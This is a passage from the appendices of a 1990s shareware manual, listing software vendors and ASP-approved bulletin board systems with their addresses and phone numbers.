Address: 23 Milton Village, Lang PDE, Milton 4064 QLD AUSTRALIA + Phone: 617-3878-4900 + + MaryKay Software + Address: 5142 N State Rd, Alma MI 48801 + Phone: 517-561-2682 + + MediaLand, Inc. + Address: 41 Bentworth Crescent, Nepean ON K2G 3X1 CANADA + Phone: 613-828-6711 + + Micom Data Services Inc + Address: 10345 Highway 78, Summerville SC 29483 + Phone: 803-821-9282 + + Appendix B, "Vendor addresses" 702 + + + + MicroData Computer Services + Address: 6510 Parkland Ave, Brook Park OH 44142 + Phone: 216-843-2622 + + Microforum Inc. + Address: 1 Woodborough Ave, Toronto ON M6M 5A1 CANADA + Phone: 416-656-6406 + + Microlane + Address: PL 59, Ikaalinen 39501 FINLAND + Phone: 950-5116251 + + Microsolve Technologies + Address: Brodorion House, 19 Brodorion Drive, Morriston SWANSEA + SA6 6LP U.K. + Phone: 441792775909 + + Miller's Computers + Address: 5791 Library Road, Bethel Park PA 15102 + Phone: 412-854-2022 + + MNK Technology + Address: 7 Yardarm Court, Greensboro NC 27455 + Phone: 910-282-8060 + + Mobbley's Computers + Address: 6260 Thorold Stone Rd, Niagara Falls ON L2J 1AF CANADA + Phone: 905-354-2339 + + Mom 'N' Pop's Software + Address: 3431 Dow Lane, Spring Hill FL 34609 + Phone: 352-688-9108 + + Monster Media Inc + Address: 2331 Ardmore Ave, Royal Oak MI 48073-3601 + Phone: 810-547-8160 + + Morrison Wallace + Address: Suite 1, 15 Grosvenor St, Neutral Bay NSW 2089 + AUSTRALIA + Phone: 02 9539332 + + Most Significant Bits + Address: 37207 Colorado Ave, Avon OH 44011-1527 + Phone: 216-221-6665 + + Mr Disk Software + Address: 5915 Casey Drive, Knoxville TN 37909 + Phone: 615-584-3952 + + Neon Publishing Inc + Address: 13750 McCormick Drive, Tampa FL 33626 + Phone: 813-854-5515 + + Appendix B, "Vendor addresses" 703 + + + + NovaWare, Inc. + Address: 7477 Stanford, St Louis MO 63130 + Phone: 314-862-6311 + + Nurseware + th + Address: 1718 NW 56 Avenue, Lauderhill FL 33313-4844 + Phone: 954-484-5130 + + OWOBOPTE Industries Inc + Address: 3101 Sibley Memorial Hwy, Eagan MN 55121 + Phone: 612-686-0405 + + P & A Co., Ltd + Address: 1-3-6-2 Kamisunacho, Tachikawa, TOKYO 190 JAPAN + Phone: 0425-35-9901 + + P.D.(&Shareware)Software Library + Address: Winscombe House, Beacon Rd, Crowborough Sussex TN6 + 1UL U.K. + Phone: 0892-663298 + + Pacific HiTech Inc + Address: 3855 South 500 W Ste M, Salt Lake City UT 84115 + Phone: 801-261-1024 X212 + + Paramedia Co + Address: Tae Hwa Bldg 200 714-1 Daelim 3 don, Youngdungpo-Gu, + Seoul 150-073 KOREA + Phone: 853-4068 + + PC Independent User Group + Address: 87 High Street, Tonbridge Kent TN9 1RX U.K. + Phone: 0732-771512 + + PC-Klubben Danmark + Address: Box 2273, V1by Torv 3, Viby J DK-8260 Denmark + Phone: 45-86110600 + + Pearl America Inc + Address: 4824 California Ave SW, Seattle WA 98116 + Phone: 206-938-0336 + + Pennant Enterprises Inc + Address: 4207 Elmhurst, Toledo OH 43613 + Phone: 419-473-0875 + + Personal Computer Services + Address: 14 Crawford Street, Dunedin 9011 NEW ZEALAND + Phone: 064-03-4777-288 + + Phillips Software + Address: 21 Caudle Avenue, Lakenheath SUFFOLK 1P27 9AV ENGLAND + Phone: 01-842-860247 + + Appendix B, "Vendor addresses" 704 + + + + Politiken + Address: Raadhuspladsen 37, COPENHAGEN 1785 V DENMARK + Phone: 45 33 11 85 11 + + Prime Soft, W. Willaredt + Address: Dorfwisenstr. 14/PF 18, CH-8165 SCHOFFLISDORF + SWITZERLAND + Phone: 41-1-875-01102 + + Professional Systems Group, LTD. + Address: 210 Woodgate Dr S #D, Brandon MS 39042-2424 + Phone: 601-936-4866 + + Public (software) Library + Address: PO BOX 35705, Houston TX 77235-5705 + Phone: 713-524-6394 + + Quantum Axcess + th + Address: 240 N 5 St Ste 100, Columbus OH 43215-2611 + Phone: 614-228-3903 + + R & K Software + Address: 2165 Salem Avenue N, St Petersburg FL 33714-4139 + Phone: 813-526-8713 + + R & R Gifts & Collectables + Address: 604 Mercer Avenue, Decatur IN 46733 + Phone: 219-724-8606 + + R.F. South Pacific Shareware + Address: 27 Chester Ave, Baulkham Hills NSW 2153 AUSTRALIA + Phone: 02-624-5205 + + Reasonable Solutions, Inc + Address: 1535 E University Drive, Mesa AZ 85203-8132 + Phone: 602-668-0017 + + SBD Software + Address: 305 Tom Link Road, Cotton Town TN 37048 + Phone: 615-325-0002 + + Sharedisk + Address: 81 Carp Road, Bonaero Park 1619 SOUTH AFRICA + Phone: 011 440-7090 + + ShareTech + Address: 1236 Disk Drive Ste E, Medford OR 97501 + Phone: 503-858-1787 + + Shareware + Address: PO Box 7037, Long Beach CA 90807-0037 + Phone: 310-499-1262 + + Appendix B, "Vendor addresses" 705 + + + + Shareware Distributie Nederland + Address: Industrieweg 12, 2102 LH Hemstede NETHERLANDS' + Phone: 31-23-5295347 + + Shareware Source + Address: 41 Blythewood Drive, Greenville SC 29607 + Phone: 803-232-7102 + + Shareware To Go + Address: PO Box 31303, Raleigh NC 27622-1303 + Phone: 800-277-DISK + + Shareware Unlimited Plus + Address: 5225 Canyon Crest Dr #71-315, Riverside CA 92507 + Phone: 909-789-2336 + + Shareware World + Address: PO Box 757, Seven Hills NSW 2147 AUSTRALIA + Phone: 61 2 671-6647 + + Shiny AB + Address: Box 204, Vallentuna 186 24 SWEDEN + Phone: 46-8-511-749-80 + + Simply Software Ltd + Address: PO Box 1391, Greenwood NS BOP 1NO CANADA + Phone: 902-765-2534 + + SoftMarket S.A. + Address: Lincoyan 1040, Nunoa, Santiago CHILE + Phone: 562-3413083 + + SoftMate GmbH + Address: Kapfenburgstrasse 74, STUTTGART 70469 GERMANY + Phone: 0049 711 85977-0 + + Software Advantage + Address: 3556 Sullivant Ave Ste 303, Columbus OH 43204 + Phone: 614-279-9828 + + Software Heaven (Australia) Pty Ltd + Address: Shop 2, 658 Pittwater Rd, Brookvale NSW 2100 AUSTRALIA + Phone: 61-2-905-7006 + + Software Testing Laboratories + Address: PO Box 19771, Indianapolis IN 46219-9771 + Phone: 317-322-2000 + + Spotlight Software Inc + Address: 957 S Glendale St, Wichita KS 67218 + Phone: 316-683-4949 + + Appendix B, "Vendor addresses" 706 + + + + Stan Reel Company + Address: 619 E Gutierrez St Ste C, Santa Barbara CA + 93103-3238 + Phone: 805-962-5232 + + Symbiosis + Address: 5777 Riverside Dr, Cape Coral FL 33904 + Phone: 941-542-6079 + + Synchron Data + Address: Tranbarsvagen 25:14, Ronneby 37238 SWEDEN + Phone: 46-457-14566 + + Systems Comunicazioni SRL + Address: v Olanda 6, Gaggiano 20083 ITALY + Phone: 39-2-90841814 + + T'gus + Address: 8980 Underwood Ln N, Maple Grove MN 55369-6717 + Phone: 612-420-6469 + + Tech Now + Address: 77 Plymouth Ave, East Wareham MA 02538 + Phone: 508-295-2339 + + The Cobb Group + Address: 9420 Bunsen Parkway, Louisville KY 40220 + Phone: 502-493-3428 + + The Game Grid + Address: 1907 Twain Place, Placentia CA 92670 + Phone: 714-528-7358 + + The Hi-Tech Marketplace + Address: 3 Vernon Street, Parlin NJ 08859 + Phone: 908-525-2581 + + The McGraw-Hill Companies + th + Address: 11 W 19 Street, New York NY 10011 + Phone: 212-337-5038 + + The Shareware Shoppe + Address: PO Box 454, Ferndale NY 12734 + Phone: 914-295-9166 + + The Simple Series + Address: PO BOX 1167, PLAISTOW NH 03865-1167 + Phone: 603-362-5792 + + The Software Choice + Address: 801 Volvo Parkway # 134, Chesapeake VA 23320 + Phone: 804-549-2442 + + Appendix B, "Vendor addresses" 707 + + + + Theresia Blaecker + Address: Auf der Harre 13, Edewecht Jeddeloh I D-26188 GERMANY + Phone: 49 044 057229 + + Totronik + Address: Rotebuehlstrasse 85, D-70178 Stuttgart WEST GERMANY + Phone: 711-6271980 + + TRAX + Address: STEENSTRAAT 61, Zedelgem-Aartrijke BELGIUM 8211 EUROPE + Phone: 32-50-20-07-35 + + Tryware + Address: 42 Churchill Road, Ovingham SA 5082 AUSTRALIA + Phone: 618-269-1108 + + Ultimax + th + Address: 167 100 Ave, Montreal QU H1A 2B6 CANADA + Phone: 514-644-1809 + + Universal Software + Address: 5525 Lorelei Avenue, Lakewood CA 90712 + Phone: 310-866-1274 + + ValueWare + Address: 142 W End Ave, Knoxville TN 37922-2822 + Phone: 800-441-7604 + + White Roe-Shareware + Address: Fairview Mall PO Box 55191, 1800 Sheppard Ave East, + North York ON M2J 5B9 CANADA + Phone: 416-255-9036 + + Wholesale Express + Address: 7333 Cedar Creek Ct, Winter Park FL 32792-6567 + Phone: 407-679-1098 + + WindowShare + Address: 46-48, Route de Thionville, Zone Maison Neuve, + 57140-WOIPPY FRANCE + Phone: 87 30 85 57 + + Wiz Technology Inc + Address: 32951 Calle Perfecto, San Juan Capistrano CA 92675 + Phone: 714-443-3000 + + Zan Specialty Products Inc + Address: 1103 Napoleon Road, Jackson MI 49201-9148 + Phone: 517-764-9297 + + Appendix C, "Bulletin Boards" 708 + + + + + + Appendix C + Bulletin Boards + + This appendix lists each ASP-approved computer bulletin board + system (BBS). These BBSs have agreed to abide by ethical stan- + dards when offering shareware. + + Set your communications software to "8 data bits, no parity, 1 + stop bit" before calling any of these BBSs. + + + **CCAT** + Address: 11326 Dew Creek Circle, Corpus Christi TX 78410 + BBS Phone: 512-242-2206 + th + 24 Street Exchange + st + Address: 1507 21 Street Suite 107, Sacramento CA 95814 + BBS Phone: 916-448-2483 + + A Community BBS + Address: PO Box 276, Monrovia CA 91017 + BBS Phone: 818-358-3811 + + A to Z Tech Line + th + Address: 21024 SE 269 , Kent WA 98042 + BBS Phone: 206-432-4732 + + AAA Legal BBS + Address: 303 S Ridge Road Apt 1, Boiling Springs PA 17007 + BBS Phone: 717-258-8094 + + Absolute Pleasure BBS + Address: PO Box 3235, Skokie IL 60076 + BBS Phone: 708-677-3369 + + Ace-Station- BBS + Address: 9401 Orion Ave, North Hills CA 91343 + BBS Phone: 818-891-0397 + + Agora Online + Address: P.O. Box 3320, Bayonne N.J. 07002 + BBS Phone: 201-437-4355 + + Alpha City BBS + Address: 59 Gatineau St, Oshawa ON L1H 7G2 CANADA + BBS Phone: 905-579-6302 + + Aquarius BBS + Address: 1206 Lackey Street, Paducah KY 42003-3472 + BBS Phone: 502-443-4707 + + Appendix C, "Bulletin Boards" 709 + + + + Archives BBS + Address: 100 Nestles Lane, Acushnet MA 02743 + BBS Phone: 508-995-0085 + + Artist On-Line Info Sys + Address: Blk 458 Ang Mo Kio #14-1584, SINGAPORE 2056 SINGAPORE + BBS Phone: 65 456-1100 + + AspenWood BBS + Address: 1220 S Parker Rd #110, Denver CO 80231 + BBS Phone: 303-388-0336 + + AstroBBS + Address: 5240 Bank St # 17, Fort Myers FL 33907 + BBS Phone: 813-939-5630 + + At The GIFfer's + Address: 4577 Gunn Highway Ste 170, TAMPA FL 33624 + BBS Phone: 813-969-2761 + + Atomic Dog BBS + Address: PO Box 523, Medford MA 02155-0004 + BBS Phone: 617-279-3561 + + Attard Communications + Address: 20 Fairway Dr, Centereach NY 11720 + BBS Phone: 800-638-8369 + + Attention to Details BBS + Address: 5085 Trail Canyon Drive, Mira Loma CA 91752-1685 + BBS Phone: 909-681-6221 + + BackTrackers + Address: 124 Bittersweet Lane, Lansing KS 66043-1401 + BBS Phone: 913-727-2043 + + BBS 2000 + Address: C.so Vitt. Emanuele 15, Milano 20122 ITALY + BBS Phone: 39 2 781147 + + BBS Express + Address: PO Box 4505, Santa Rosa CA 95402 + BBS Phone: 707-571-7526 + + BBS WorkShop + Address: Sopark Alle 86, Glumso DK4171 DENMARK + BBS Phone: 45-57645050 + + Bits N' Bytes BBS + Address: PO Box 8194, Winslow ME 04901 + BBS Phone: 207-873-1937 + + Appendix C, "Bulletin Boards" 710 + + + + Bluegrass RBBS + Address: 686 Sheridan Dr, Lexington KY 40503-1726 + BBS Phone: 606-272-0499 + + Bobbcat + Address: 26 Elizabeth Street, Orangeville ON L9W 1C1 CANADA + BBS Phone: 519-940-4990 + + BorderTown BBS + Address: 332 East Main ST, Westminster MD 21157 + BBS Phone: 410-876-5101 + + Buller BBS + Address: PO Box 1004, Bastad S-26921 SWEDEN + BBS Phone: 46-431-70909 + + Cadmos / CHAOS + Address: Skoufa 26, Athens 106 73 GREECE + BBS Phone: 301-360-6044 + + California Data Exchange + Address: 7086 Enright Dr, Citrus Heights CA 95621 + BBS Phone: 916-729-1043 + + CATS-BBS + Address: Parque Residencial, S. Sebastiao, BL 3-R/C ESQ., 2655 + Ericeira PORTUGAL + BBS Phone: 351 061865656/818 + + CBUG BBS + Address: PO BOX 125, COLUMBIA MD 21045 + BBS Phone: 301-750-1253 + + Center Island BBS + Address: PO Box 1 Van Anda, Texada Island BC V0N 3K0 CANADA + BBS Phone: 604-486-7229 + + Central Europe BBS + Address: Hansastr. 25, Furth D-90766 GERMANY + BBS Phone: 49-911-97344-44 + + Channel 1 Communications + Address: PO BOX 338, Cambridge MA 02238 + BBS Phone: 617-354-3230 + + Charleston Communications Inc. + Address: PO Box 85178, Las Vegas NV 89185-0178 + BBS Phone: 702-386-7979 + + ChatterBox + Address: 26 Cygnet Close, Larkfield AylesFord KENT ME20 6QH + U.K. + BBS Phone: 44 732-870941 + + Appendix C, "Bulletin Boards" 711 + + + + Chicago Syslink + Address: 1643 South Gunderson Ave, Berwyn IL 60402 + BBS Phone: 708-795-4442 + + Chip -N- Disk BBS + Address: PO Box 89, Trevor WI 53179-0089 + BBS Phone: 414-862-6221 + + Chollian Magicall + Address: 65-228 Hangangro-3GA, Youngsan-Ku, Seoul 140-110 KOREA + BBS Phone: 82-2-790-1522 + + Classified Connection + Address: PO Box 50047, San Diego CA 92165 + BBS Phone: 619-281-2002 + + Clavius + Address: C/ Francos Rodriguez 42-2-9, Madrid 28039 SPAIN + BBS Phone: 34-1-3112371 + + Cliffside BBS + Address: PO Box 215, Cliffside NC 28024 + BBS Phone: 704-657-4154 + + Clnet Inc + Address: 150 Chestnut Street, San Francisco CA 94111 + BBS Phone: WWW.SHAREWARE.COM + + Collector's Edition + Address: 3733 Rockdale Dr, Dallas TX 75220-1863 + BBS Phone: 214-351-9859 + + Comp. Parts & Software Exchang + Address: 202 West Westwood Drive, Kalamazoo MI 49006-4344 + BBS Phone: 616-383-9436 + + CompuServe PCNet-Online + Address: 1705 Barclay Drive, Austin TX 78746 + + Computer Link + Address: 5415 Dundas Street West #301, Etobicoke ON M9B 1B5 + CANADA + BBS Phone: 416-233-5410 + + Computer Users Exchange (CUE) + Address: 1710 SW 33ST, Topeka KS 66611-2504 + BBS Phone: 913-267-1903 + + Computrol BBS + Address: PO Box 281, Hornsby NSW 2077 AUSTRALIA + BBS Phone: 61-2-489-6848 + + Appendix C, "Bulletin Boards" 712 + + + + Connect Ireland + Address: 20 Mark Street, Dublin 2 IRELAND + BBS Phone: 353-1-6711687 + + Conway PC Users Group BBS + Address: PO BOX 10442, Toadsuck Station, Conway AR 72032 + BBS Phone: 501-329-7227 + + Cornucopia TBBS + Address: 1530 Cavendish Road, Winter Park FL 32789 + BBS Phone: 407-645-4929 + + County Seat BBS + Address: 105 N River Road # 111, Mt Clemens MI 48043-1927 + BBS Phone: 810-468-2625 + + Crystal Mountain BBS + Address: 402 Chestnut Hill Ave, Athol MA 01331 + BBS Phone: 508-249-2156 + + Cyberia Communications, Inc + Address: One Market Way East, York PA 17401 + BBS Phone: 717-848-1666 + + Dagan Software BBS + Address: 8130 Dagan St, Anchorage AK 99502 + BBS Phone: 907-248-8130 + + Danish Key Board BBS + Address: Vesterbrogade 171, Frederiksberg C DK-1800 DENMARK + BBS Phone: 45-332-55600 + + Darin + Address: PO Box 202, Qatif 31911, SAUDI ARABIA + BBS Phone: 966-3-855-2131 + + Dataland BBS + Address: 7303 Hana Rd, Edison NJ 08817 + BBS Phone: 908-572-5762 + + DataLynx BBS + Address: Capri Electronics Corp, PO Box 589, Bayfield CO + 81122-0589 + BBS Phone: 970-884-6001 + + Deep Cove OnLine Ltd + Address: PO Box 45504, Sunnyside Mall PO, Surrey BC V4A 9N3 + CANADA + BBS Phone: 604-536-5885 + + Del Ches Systems BBS + Address: 11 Andover Drive, Exton PA 19341 + BBS Phone: 610-363-6625 + + Appendix C, "Bulletin Boards" 713 + + + + Destination CPU + Address: PO Box 906, Elmira NY 14902-0906 + BBS Phone: 607-737-6901 + + DFG Financial BBS + Address: PO Drawer 4006, 606 North Eighth Street, Opelika AL + 36803-4006 + BBS Phone: 334-745-0579 + + Direct Connect + Address: PO Box 6684, Philadelphia PA 19149 + BBS Phone: 215-535-1917 + + DR. SNED'S RBBS-IN-A-BOX + Address: RT # 1 BOX 232, San Mateo FL 32187-9801 + BBS Phone: 904-325-6558 + + DreamLine II BBS + Address: 10 Pleasant Rd, Norristown PA 19401 + BBS Phone: 610-279-2760 + + DSC BBS + Address: 17 Richard Rd, Ivyland PA 18974-1512 + BBS Phone: 215-443-9434 + + Eagle's Nest Retreat + Address: 636 1/2 Tayco Street, Menasha WI 54952 + BBS Phone: 414-729-1157 + + Edoma BBS + Address: Jerningham Street, Curepipe Road, MAURITIUS IS + BBS Phone: 230-674-8260 + + Electro-Technika + Address: P.O. Box 8210, Colorado Springs CO 80933-8210 + BBS Phone: 719-380-0541 + + EmmaSoft Software Company, Inc + Address: PO BOX 238, LANSING NY 14882-0238 + BBS Phone: 607-533-7072 + + Europa BBS + Address: Nicolasa Gomez, 80 B, 28022 MADRID SPAIN + BBS Phone: 34-1-320-8460 #2 + + Evergreen BBS + Address: 12 More Rd, Sommerville NJ 08876-5286 + BBS Phone: 201-398-2373 + + Excalibur's BBS + Address: PO Box 293, Canton CT 06019 + BBS Phone: 203-693-9930 + + Appendix C, "Bulletin Boards" 714 + + + + Exec-PC + th + Address: 2105 S 170 Street, New Berlin WI 53151 + BBS Phone: 414-789-4210 + + Fantasy Land + Address: 435 N Walnut, Springfield IL 62702 + BBS Phone: 214-535-1005 + + Full Connection BBS + Address: Caixa Postal 108, Santo Andre - SP BRAZIL + BBS Phone: 011 440 7344 + + GaiaNet BBS + Address: 2700 Benedict Canyon Drive, Beverly Hills CA 90210 + BBS Phone: 310-724-8965 + + GEnie IBM R/T + Address: 100 Bleecker St #19E, New York NY 10012 + BBS Phone: 800-638-9636 + + GeoFract BBS + Address: 17729 Devall Road, Spencerville IN 46788-9202 + BBS Phone: 219-627-3309 + + GLIB + Address: PO BOX 636, ARLINGTON VA 22216 + BBS Phone: 703-578-4542 + + H.C.C. Dept. Almere + Address: Alban Bergstraat 35, 1323 GG Almere NETHERLANDS + BBS Phone: 031-036-5364253 + + HACOM BBS + Address: CoelHorster Appel Gaarde 36, Amersfoort 3824 BT + NETHERLANDS + BBS Phone: 31-33-4570244 + + HAL 9000 BBS + Address: 5145 Pontiac Trail, Ann Arbor MI 48105-9627 + BBS Phone: 313-663-4173 + + Hamster BBS + Address: ZIMMERSTRASSE 9, 58638 ISERLOHN GERMANY + BBS Phone: 49 237114490 + + HAWG WILD! BBS, INC. + Address: PO Box 540691, Omaha NE 68154 + BBS Phone: 402-597-2666 + + Hawk's Castle + Address: 61 Juniper, Birch Hill, Bracknell BERKS RG12 7ZF U.K. + BBS Phone: 344 411621 + + Appendix C, "Bulletin Boards" 715 + + + + Hi-Desert Hangout + Address: Suite H-125, 3053 Rancho Vista Blvd, Palmdale CA + 93551 + BBS Phone: 805-722-5758 + + Hogard Software Solutions + Address: 4533 Marblearch Dr, Grand Prairie TX 75052 + BBS Phone: 214-641-6292 + + Hollywood News/Info System + Address: PO Box 366, Hollywood MD 20636 + BBS Phone: 301-373-3530 + + HouseNet BBS + Address: PO Box 520, St Michaels MD 21663 + BBS Phone: 410-745-2037 + + Hubert Middle School + Address: 768 Grant Street, Savannah GA 31499 + BBS Phone: 912-651-5632 + + HUG & Lincoln Software + Address: 1136 Sunnyside Drive, Hagerstown MD 21742-3044 + BBS Phone: 301-733-6456 + + Hunter's Info Service + Address: PO Box 9887, Baltimore MD 21284 + BBS Phone: 410-668-3793 + + Icaro BBS + Address: c/o Luis de Salazar, 9 5C, MADRID 28002 SPAIN + BBS Phone: 011-34-1-519-4645 + + Impact! Online + Address: 8855 SW Brabham Way, Gaston OR 97119 + BBS Phone: 503-985-3408 + + INFO-CENTER BBS + Address: De Hassels 2, B-2400 MOL BELGIUM + BBS Phone: 32 14 311 455 + + Intercity BBS + Address: 4615 PATTERSON AVE, RICHMOND VA 23226-1341 + BBS Phone: 804-353-4160 + + Jacob's House BBS + Address: 1101 S Stadium, Alice TX 78332 + BBS Phone: 512-664-7570 + + JADE + Address: 416 Colby Ct, Janesville WI 53546 + BBS Phone: 608-757-3000 + + Appendix C, "Bulletin Boards" 716 + + + + JAPCUG + Address: 1804 Chapin St, Jackson MI 49203-1804 + BBS Phone: 517-789-7556 + + JBJ Systems PC Board BBS + Address: 1549 Methyl Street, Pittsburgh PA 15216 + BBS Phone: 412-341-9323 + + Jupiter BBS + Address: PO Box 935, Jupiter FL 33468-0935 + BBS Phone: 407-575-3853 + + L.I.N.E. + Address: PO Box 19, Greenlawn NY 11740 + BBS Phone: 516-261-9701 + + Last Chance TBBS + Address: PO Box 2536, Universal City TX 78148 + BBS Phone: 210-822-7519 + + Late Nite DIVERSIONS + Address: #2-1200 London Road Ste 241, Sarnia ONT N7V 2B9 + CANADA + BBS Phone: 519-332-0241 + + Lighthouse BBS + Address: 526 S Woodland Ave, Michigan City IN 46360 + BBS Phone: 219-864-1066 + + Live Wire BBS Calcutta + Address: C/O M.L. Khemka & Sons, 4 Floor,6 OLD Post Office St, + Calcutta - 1 INDIA (W.B.) + BBS Phone: 33-2481356 + + Magpie BBS + Address: 301 East Main St, CROTHERSVILLE IN 47229 + BBS Phone: 812-793-2237 + + Mainstreet Online + Address: 502 Fontanelle Ct, San Jose CA 95111-1712 + BBS Phone: 408-224-7523 + + mAp/LZ + Address: 6049 Dwight, Dearborn Hgts MI 48127 + BBS Phone: 313-563-8940 + + Mars Media Inc + Address: 37 Pidgeon Hill Dr # 180, Sterling VA 20165-6102 + BBS Phone: 703-742-9296 + + Media Concept BBS + Address: RUE DE SAINT LEGER 40, LUSTIN B-5170 BELGIUM + BBS Phone: 011 32 411300 + + Appendix C, "Bulletin Boards" 717 + + + + MegaComm(sm)BBS + Address: Treesahran Industries, 336 Lafayette Drive, Culpeper + VA 22701-3963 + BBS Phone: 540-829-2441 + + MetroPitt BBS + Address: 125 John Giel Drive, Glenshaw PA 15116-2803 + BBS Phone: 412-487-9223 + + Micro Message Service (MMS) + Address: 1464 Garmer Station Blvd, Suite 100, Raleigh NC 27603 + BBS Phone: 919-779-6647 + + Microlink D + Address: 12244 Applewood Knolls Dr, Lakewood CO 80215 + BBS Phone: 303-237-8575 + + MicroMetric Support BBS + Address: 98 Dade Ave, Sarasota FL 34232-1609 + BBS Phone: 813-371-2490 + + Midwest Data Exchange + Address: 614 1/2 S Main St, Aberdeen SD 57401-6013 + BBS Phone: 605-226-2428 + + Mr Wonderful's Lair + Address: 670 South Anderson St, Los Angeles CA 90023 + BBS Phone: 213-261-8055 + + MSmac BBS + Address: Rua Princesa Benedita n-4 1-dr, Torres Vedras 2560 + PORTUGAL + BBS Phone: 351-61-314336 + + MSN Shareware Forum + th + Address: 2526 69 Ave S, St Petersburg FL 33712-5631 + + MultiServer + Address: Schubertstraat 38, 8031 ZE Zwolle NETHERLANDS + BBS Phone: 31-38-541358 + + MultiSystem TBBS + Address: 2524 Elmdale Drive, Cincinnati OH 45230-1213 + BBS Phone: 513-231-7013 + + My BBS + Address: 5407 Maple Lane, Tampa FL 33610 + BBS Phone: 813-621-2115 + + My Computer Company + Address: PO Box 99, 25 Albert St, Erskineville NSW 2043 + AUSTRALIA + BBS Phone: 612-565-1044 + + Appendix C, "Bulletin Boards" 718 + + + + My Home BBS! + Address: PO Box 16203, Augusta GA 30919-2203 + BBS Phone: 706-733-1124 + + NAFI On-line + Address: PO Box 957257, 2155 Stonington Ave # 118, Hoffman + Estates IL 60194 + BBS Phone: 847-885-9305 + + NCS Cape Town + Address: 57 Bedford St, Parow CAPE TOWN 7500 SOUTH AFRICA + BBS Phone: 27-21-930-4654 + + Nite-Air BBS + Address: 5820 Bartlett Road, Rome NY 13440 + BBS Phone: 315-339-8831 + + NJ Computer Connection + Address: PO BOX 6909, Lawrenceville NJ 08648 + BBS Phone: 609-895-0398 + + NJPCUG + Address: PO BOX 14, Paraums NJ 07653-0014 + BBS Phone: 201-835-3122 + + Node 1 BBS + Address: Al dos Aicas, 1507, Moema-Sao Paulo CEP 04086-003 + BRAZIL + BBS Phone: 55-11-5561-3155 + + Node Dakota BBS + Address: 1911 San Diego Dr, Bismarck ND 58504-7222 + BBS Phone: 701-224-1431 + + NORDIC Enterprises EDMS + Address: PO BOX 509, Ipswich MA 01938 + BBS Phone: 508-356-1166 + + Northern Exposure + Address: 43 Primrose Crescent, Fulwell SUNDERLAND SR6 9RJ + ENGLAND + BBS Phone: 44 91-548-0892 + + Nucleus Information Service + th + Address: 1835 B 10 Ave SW, Calgary Alberta T3C 0K2 CANADA + BBS Phone: 403-541-9400 + + OBSdata-BBS + Address: Nuevo Chilches 3 Nr.5, Chilches-Malaga 29760 SPAIN + BBS Phone: 34-95-251-4228 + + Appendix C, "Bulletin Boards" 719 + + + + Online Systems of Canada + Address: 383 Richmond Street, Ste 900, London ON N6A 3C4 + CANADA + BBS Phone: 519-642-0700 + + Opus Networx + th + Address: PO Box Int'l #4N-1223, 8340 NW 56 Street, Miami FL + 33166 + BBS Phone: 809-628-5023 + + OTB Communication System + Address: 14-121 Ripley Court, Oakville ON L6H 1H2 CANADA + BBS Phone: 905-844-2483 + + Our Town OnLine + Address: 240 Clipper Way, Seal Beach CA 90740 + BBS Phone: 310-799-8553 + + P & A BBS + Address: 1-3-6-2 Kamisunacho, Tachikawa TOKYPO 190 JAPAN + BBS Phone: 81 425-35-9901 + + Pacific Rim Information + Address: 4580 Mt Alifan Drive, San Diego CA 92111-2504 + BBS Phone: 619-278-7361 + + PC Shop + Address: 37 Jalan Silang, Kuala Lumpur 50050 MALAYSIA + BBS Phone: 603-957-4373 + + PC-Cubed + Address: 35 Charit Way, Rochester NY 14626-1101 + BBS Phone: 716-723-8489 + + PC-DSD Direct Access BBS + Address: 1254 Elden Ave, Los Angeles CA 90006 + BBS Phone: 213-384-0809 + + PC-Ohio + Address: 23749 CEDAR ROAD, CLEVELAND OH 44122-1069 + BBS Phone: 216-381-3320 + + Peace Connection BBS + Address: Franciscan Friars, 329 Poplar at Cedar Sts, Hazard KY + 41701-1541 + BBS Phone: 606-439-1743 + + Pennsylvania OnLine! + Address: PO Box 6501, Harrisburg PA 17112 + BBS Phone: 717-657-8699 + + Appendix C, "Bulletin Boards" 720 + + + + Piedmont Rocket BBS + Address: 1436 Dry Pond Road, Granite Falls NC 28630 + BBS Phone: 704-396-1847 + + PJ Systems + Address: 7290 Britton Hwy, Britton Mi 49229 + BBS Phone: 517-451-2072 + + Prime Cut BBS + Address: 13 Kirkbrae Drive, Lincoln RI 02865-1007 + BBS Phone: 401-334-3096 + + Prime Time BBS + Address: PO Box 6997, Burbank CA 91510 + BBS Phone: 818-769-6425 + + PrometheuS + Address: via Podgora 132, 70124 Bari ITALY + BBS Phone: 39-80-551-5278 + + Psychobabble + Address: 481 Cypress Lane J-179, Greenville MS 38701 + BBS Phone: 601-332-9453 + + R.B. Enterprises + th + Address: 711 East 134 Street, Bradenton FL 34202 + BBS Phone: 941-748-8089 + + RadioComm + Address: PO Box 633, Park Ridge IL 60068 + BBS Phone: 708-518-8336 + + Rama One OnLine + th + Address: 73-35 70 Street, Glendale NY 11385 + BBS Phone: 718-366-6165 + + Real Estate Online + Address: 710 Main St, Huntington Beach CA 92648 + BBS Phone: 714-969-9624 + + Redwood 101 + Address: 9621-C North State Street, Redwood Valley CA 95470 + BBS Phone: 707-485-7843 + + Sac BBS + Address: Eset s.r.o. Ondavska 3, 826 47 Bratislava SLOVAKIA + BBS Phone: 42-7-204-8232 + + Seascape! BBS + Address: PO Box 326, Morehead City NC 28557 + BBS Phone: 919-726-9364 + + Appendix C, "Bulletin Boards" 721 + + + + Servant of the Lord + Address: 6113 W River Road, Matoaca VA 23803-8047 + BBS Phone: 804-590-2161 + + Serveur CAL + Address: Computer Answer Line - CAL, 92, cours Vitton, Lyon + 69006 FRANCE + BBS Phone: 33 72 74 04 85 + + SFE Systems BBS + Address: 13087 Hermosa Dr SW, Huntsville AL 35803-2569 + BBS Phone: 205-650-0107 + + Shareware Express BBS + Address: 1908 Ashland Street #D, Ashland OR 97520 + BBS Phone: 503-488-0321 + + Sharpenit! RBBS + Address: 65 Valentine Street, Agawam MA 01001 + BBS Phone: 413-786-4706 + + Sigma Industries BBS + Address: 800 S. Main St, Lakeport CA 95453 + BBS Phone: 707-263-8582 + + SIGMA IOTIA RBBS + Address: 4006 Desert Drive, Pasco WA 99301 + BBS Phone: 509-545-9879 + + Skip's Doghouse BBS + Address: 621 Big Horn Dr, O'Fallom MO 63366-6944 + BBS Phone: 314-240-7547 + + Alves, Miguel Lupi + Address: Estrada da Luz 161-31 Dto, Lisboa 1600 PORTUGAL + BBS Phone: 351 1 7269042 + + SkyWatch + Address: 2667 Rothwell St, Regina SK S4N 2E2 CANADA + BBS Phone: 306-569-0581 + + Solar + Address: 825 Belvedere Sud # 100, Sherbrooke QB J1H 4B9 CANADA + BBS Phone: 819-564-3198 + + Southern Star BBS + Address: Box 7335, Metairie LA 70010 + BBS Phone: 504-885-5928 + + 